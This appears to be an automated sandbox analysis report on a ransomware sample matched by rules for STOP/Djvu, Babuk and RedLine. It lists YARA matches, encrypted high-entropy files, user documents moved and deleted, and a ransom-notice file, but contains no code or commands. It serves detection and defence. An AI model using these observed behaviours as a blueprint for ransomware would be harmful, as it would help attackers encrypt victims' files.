                Source: unknownHTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49762 version: TLS 1.2
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00C122E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC,0_2_00C122E0
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crlJump to dropped file

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Yara detected Babuk Ransomware
                Source: Yara matchFile source: Process Memory Space: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe PID: 7596, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe PID: 7608, type: MEMORYSTR
                Yara detected Djvu Ransomware
                Source: Yara matchFile source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, type: SAMPLE
                Source: Yara matchFile source: 10.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1662696538.0000000003391000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.1667079139.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1921214760.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000000.1797777128.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.1666176128.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000000.1910389769.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.1646052192.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1841955191.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe PID: 7496, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe PID: 7596, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe PID: 7608, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe PID: 7872, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe PID: 7256, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\tmp3BC7.tmp, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, type: DROPPED
                Modifies existing user documents (likely ransomware behavior)
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile moved: C:\Users\user\Desktop\WKXEWIOTXI.pngJump to behavior
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile deleted: C:\Users\user\Desktop\WKXEWIOTXI.pngJump to behavior
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile moved: C:\Users\user\Desktop\XZXHAVGRAG\XZXHAVGRAG.docxJump to behavior
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile deleted: C:\Users\user\Desktop\XZXHAVGRAG\XZXHAVGRAG.docxJump to behavior
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile moved: C:\Users\user\Desktop\NWTVCDUMOB.pdfJump to behavior
                Writes a notice file (html or txt) to demand a ransom
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt -> decryption settings;change encryption settings"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevices.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevices"},"system.comment":{"type":12,"value":"bluetooth and other devices settings"},"system.highkeywords":{"type":12,"value":"device;projector;projectors;pair bluetooth device;unpair device;pair device;bluetooth settings;add bluetooth device;add device"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevicespen-2.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevicespen"},"system.comment":{"type":12,"value":"pen and windows ink settings"},"system.highkeywords":{"type":12,"value":"pens;handedness;cursor;cursors;writing;write;workspace;pen shortcuts;hJump to dropped file
                Writes many files with high entropy
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-03_114932_b84-2220.log entropy: 7.99321923661Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440007v3.xml entropy: 7.99633858861Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440002v9.xml entropy: 7.99567442479Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-1157.log entropy: 7.99855650994Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Temp\msedge_installer.log entropy: 7.99165453497Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Temp\offline.session64 entropy: 7.99743314954Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt entropy: 7.99234497Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408903214673664.txt entropy: 7.99809526657Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408903167889885.txt entropy: 7.99827685285Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906620712704.txt entropy: 7.99850087943Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906321630689.txt entropy: 7.99821120979Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408904996229952.txt entropy: 7.99826195763Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json entropy: 7.99874475923Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133495120919029457.txt entropy: 7.99841423364Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408945543294083.txt entropy: 7.99854993362Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408908224609935.txt entropy: 7.99834229688Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408907975188232.txt entropy: 7.99836327726Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite entropy: 7.99852243716Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl entropy: 7.99737886946Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db entropy: 7.99371005985Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings_2.0-2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1 entropy: 7.99863276955Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log entropy: 7.99747232056Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Safety\edge\remote\script_300161259571223429446516194326035503227.rel.v2 entropy: 7.99799085794Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Safety\shell\remote\script_96032244749497702726114603847611723578.rel.v2 entropy: 7.99421423672Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin entropy: 7.99720082395Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\Local Settings\Temp\DESKTOP-AGET0TR-20231004-1157.log.cdqw (copy) entropy: 7.99855650994Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\Local Settings\Temp\msedge_installer.log.cdqw (copy) entropy: 7.99165453497Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\Local Settings\Temp\offline.session64.cdqw (copy) entropy: 7.99743314954Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\Local Settings\Temp\wct150C.tmp.cdqw (copy) entropy: 7.99761668624Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\Local Settings\Temp\wct33D7.tmp.cdqw (copy) entropy: 7.99700832208Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\Local Settings\Temp\wct38F0.tmp.cdqw (copy) entropy: 7.99714508999Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\Local Settings\Temp\wct443C.tmp.cdqw (copy) entropy: 7.99733602304Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\Local Settings\Temp\wct49A7.tmp.cdqw (copy) entropy: 7.99726929872Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\Local Settings\Temp\wctAB5F.tmp.cdqw (copy) entropy: 7.99726280694Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\Local Settings\Temp\wctDB2E.tmp.cdqw (copy) entropy: 7.99709667516Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\Local Settings\Temp\wctE4A4.tmp.cdqw (copy) entropy: 7.99758461474Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\Local Settings\Temp\wctEA40.tmp.cdqw (copy) entropy: 7.99721134729Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\Local Settings\Temp\wctF411.tmp.cdqw (copy) entropy: 7.99781021242Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\Local Settings\Temp\acrobat_sbx\acroNGLLog.txt.cdqw (copy) entropy: 7.99234497Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache64.bin.cdqw (copy) entropy: 7.99720082395Jump to dropped file
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 entropy: 7.99553172716Jump to dropped file

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, type: SAMPLEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, type: SAMPLEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 10.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 10.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 2.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 2.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 10.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 10.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 3.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 3.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 0.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 0.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 6.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 6.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 6.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 6.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 2.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 2.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 0.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 0.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 3.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 3.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 00000000.00000003.1662696538.0000000003391000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000002.00000000.1666073748.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000003.00000000.1667079139.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000000.00000000.1645947470.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 0000000A.00000002.1921214760.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 0000000A.00000002.1921120348.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000006.00000000.1797777128.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000006.00000002.1841882825.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000006.00000000.1797319331.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 0000000A.00000000.1910328345.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000003.00000000.1666987231.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000004.00000002.1746887705.0000000000633000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000002.00000000.1666176128.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 0000000A.00000000.1910389769.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000000.00000000.1646052192.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000006.00000002.1841955191.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe PID: 7496, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe PID: 7596, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe PID: 7608, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe PID: 7872, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe PID: 7256, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: C:\Users\user\AppData\Local\Temp\tmp3BC7.tmp, type: DROPPEDMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: C:\Users\user\AppData\Local\Temp\tmp3BC7.tmp, type: DROPPEDMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, type: DROPPEDMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, type: DROPPEDMatched rule: Detects STOP ransomware Author: ditekSHen
